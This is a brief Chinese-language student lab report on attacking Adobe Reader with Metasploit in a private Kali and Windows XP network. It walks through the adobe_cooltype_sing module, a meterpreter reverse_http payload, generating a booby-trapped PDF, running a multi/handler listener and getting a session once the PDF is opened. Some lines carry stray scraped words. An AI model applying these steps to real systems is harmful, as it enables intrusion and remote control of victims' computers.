20145322 Exp5 Adobe閱讀器漏洞攻擊

20145322 Exp5 Adobe閱讀器漏洞攻擊

實驗過程

IP:kali:192.168.1.102 windowsxp :192.168.1.119windows

msfconsole進入控制檯orm

使用命令爲 use windows/fileformat/adobe_cooltype_sing進入攻擊模塊blog

設置攻擊載荷payloads ,命令爲set payloads windows/meterpreter/reverse_httpit

使用命令show options來肯定須要修改的參數。io

使用命令exploit生成5333.pdfconsole

退出並從新進入msf平臺,使用命令 use exploit/multi/handler進入監聽模式,設置好參數,執行exploit等待被攻擊者的接聽。
把生成的5322.pdf移動到winxp裏面,並打開form

鏈接成功pdf

相關文章
相關標籤/搜索